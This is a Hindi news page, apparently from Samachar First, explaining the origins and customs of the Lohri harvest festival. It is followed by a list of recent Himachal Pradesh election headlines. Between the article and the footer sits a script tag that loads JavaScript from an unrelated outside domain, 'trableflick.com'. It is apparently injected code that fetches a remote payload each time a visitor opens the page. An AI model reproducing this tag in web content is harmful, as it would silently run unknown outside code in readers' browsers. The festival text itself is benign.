जानें क्यों मनाई जाती है लोहड़ी

<p>मकर संक्रांति से पहले लोहड़ी का त्योहार मनाया जाता है। इसे खास तौर पर पंजाब, हरियाणा और हिमाचल प्रदेश में मकर संक्रांति की पूर्व संध्या पर नई फसल के उत्सव के रूप में मनाया जाता है। लोहड़ी की रात खुली जगह पर आग जलाई जाती है। पारंपरिक तौर पर लोहड़ी फसल की बुआई और उसकी कटाई से जुड़ा एक विशेष त्यौहार है। लोहड़ी के दिन आग जलाकर उसके इर्दगिर्द डांस किया जाता है। इसके साथ ही इस दिन आग के पास घेरा बनाकर दुल्ला भट्टी की कहानी सुनी जाती है। लोहड़ी पर दुल्ला भट्टी की कहानी सुनने का खास महत्व होता है। कई जगहों पर लोहड़ी को तिलोड़ी भी कहा जाता है। यह शब्द तिल और रोड़ी यानी गुड़ से मिलकर बना है। बाद में तिलोड़ी को ही लोहड़ी कहा जाने लगा।</p>

<p>लोहड़ी पंजाबियों का मुख्य त्योहार है। इसलिए इसकी सबसे ज्यादा धूम पंजाब और हरियाणा में देखने को मिलती है। लोहड़ी के दिन अग्नि में तिल, गुड़, गजक, रेवड़ी और मूंगफली चढ़ाई जाती हैं। देश भर में लोहड़ी का त्योहार मनाया जा रहा है। लोहड़ी पर पंजाब में नई फसल की पूजा करने की परंपरा है। इस दिन चौराहों पर लोहड़ी जलाई जाती है। पुरुष आग के पास भांगड़ा करते हैं। वहीं, महिलाएं गिद्दा करती हैं। इस त्योहार के पीछे धार्मिक आस्थाएं भी जुड़ी हुई हैं. लोहड़ी पर आग जलाने को लेकर मान्यता है कि यह आग राजा दक्ष की पुत्री सती की याद में जलाई जाती है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

ईवीएम-वीवीपैट की दूसरी रेंडमाईजेशन विस क्षेत्र स्तर पर 19 मई को: डीसी

जिला निर्वाचन अधिकारी डीसी हेमराज बैरवा ने कहा कि लोकसभा निर्वाचन-2024 के दौरान उपयोग की…

29 mins ago

नारा लेखन में कविता तथा पोस्टर मेकिंग में तनुज अव्वल

हिमाचल प्रदेश विश्वविद्यालय क्षेत्रीय केंद्र मोहली में आयोजित  फोटोग्राफी में फारूक, नारा लेखन में कविता…

33 mins ago

नए मतदाओं का पंजीकरण कर निर्वाचन प्रक्रिया में शामिल करें: मनीष गर्ग

मुख्य निर्वाचन अधिकारी मनीष गर्ग ने आज यहां वीडियो कॉन्फ्रेंसिंग के माध्यम से सभी जिला…

36 mins ago

मनजीत सिंह ठाकुर समर्थकों सहित कांग्रेस में शामिल

शिमला। भाजपा नेता मनजीत सिंह ठाकुर अपने समर्थकों के कांग्रेस पार्टी में शामिल हो गए…

47 mins ago

हार सामने देखकर चुनाव लड़ने से पीछे हटे जयराम: मुख्यमंत्री

हार सामने देखकर चुनाव लड़ने से पीछे हटे जयराम : मुख्यमंत्री कंगना को फेल करने…

57 mins ago

नए मतदाओं का पंजीकरण कर उन्हें निर्वाचन प्रक्रिया में शामिल करने पर दिया जाए विशेष बल: मनीष गर्ग

मुख्य निर्वाचन अधिकारी मनीष गर्ग ने वीडियो कॉन्फ्रेंसिंग के माध्यम से सभी जिला निर्वाचन अधिकारियों,…

1 hour ago